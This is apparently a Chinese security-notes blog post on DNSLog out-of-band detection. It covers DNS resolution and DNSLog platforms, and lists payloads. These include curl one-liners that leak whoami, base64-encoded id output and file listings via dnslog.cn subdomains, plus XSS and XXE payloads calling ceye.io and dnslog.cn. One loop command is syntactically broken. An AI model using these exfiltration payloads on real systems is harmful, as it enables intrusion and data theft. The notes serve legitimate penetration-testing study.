网安-DNSlog

目录

DNSLog解决无回显

DNSLog利用限制

DNS解析流程

Windows环境变量大全

Linux下DNSLog利用

dns平台

XSS

XXE

SSRF


DNSLog解决无回显

带外攻击(OOB=Out of Bind)

DNSLog利用限制

1.域名层级:一般不超过5级

2.每级域名最大长度:63个ASCII字符

3.总域名长度:253个ASCII字符

4.内容限制:数字、字母、下划线

5.适用漏洞:RCE、XXE、SSRF、SQL注入、JNDI注入、反序列化等

DNS解析流程

1.hosts文件(C:\Windows\System32\drivers\etc\hosts)

2.DNS缓存(ipconfig /displaydns)

3.本地DNS服务器(路由器自身,转发给上层)

4.根DNS服务器(Root Server),13组集群服务器

5.顶级域名DNS服务器(Top Level Domain Server),如.com、.cn、.org等

6.Name Server域名服务器的地址(域名服务商提供)

Windows环境变量大全

Windows系统环境变量大全 - edolf - 博客园

Linux下DNSLog利用

获取变量值:
curl http://`whoami`.xxxxxx.dnslog.cn/
base64编码输出:
curl http://$(id|base64).xxxxxx.dnslog.cn/
循环获取文件输出:
for i in (ls/);do curl "http://i.xxxxxx.dnslog.cn/";done;

dns平台

登录 - DNSlog System
登录
DNSLog Platform
CEYE - Monitor service for security testing

1.常用payloads
2.在线查询记录(HTTP/DNS),可下载
3.提供在线API,各种编程语言可调用
4.DNS Rebinding Server
DNS Rebinding Bypass SSRF-先知社区

XSS

<script src = haha.z6iktj.ceye.io></script>

dnslog反应

XXE

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://hahaha.skhn7t.dnslog.cn">%remote;]>

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE root [

<!ENTITY % remote SYSTEM "http://hahaha.z6iktj.ceye.io">

%remote;]>

<root/>

SSRF

相关推荐
枷锁—sha6 小时前
【SRC】SQL注入WAF 绕过应对策略(二)
网络·数据库·python·sql·安全·网络安全
天荒地老笑话么14 小时前
静态 IP 规划:掩码/网关/DNS 的正确组合
网络·网络协议·tcp/ip·网络安全
大方子1 天前
【PolarCTF】rce1
网络安全·polarctf
枷锁—sha1 天前
Burp Suite 抓包全流程与 Xray 联动自动挖洞指南
网络·安全·网络安全
聚铭网络1 天前
聚铭网络再度入选2026年度扬州市网络和数据安全服务资源池单位
网络安全
darkb1rd1 天前
八、PHP SAPI与运行环境差异
开发语言·网络安全·php·webshell
世界尽头与你2 天前
(修复方案)基础目录枚举漏洞
安全·网络安全·渗透测试
枷锁—sha2 天前
【SRC】SQL注入快速判定与应对策略(一)
网络·数据库·sql·安全·网络安全·系统安全
liann1193 天前
3.1_网络——基础
网络·安全·web安全·http·网络安全
ESBK20253 天前
第四届移动互联网、云计算与信息安全国际会议(MICCIS 2026)二轮征稿启动,诚邀全球学者共赴学术盛宴
大数据·网络·物联网·网络安全·云计算·密码学·信息与通信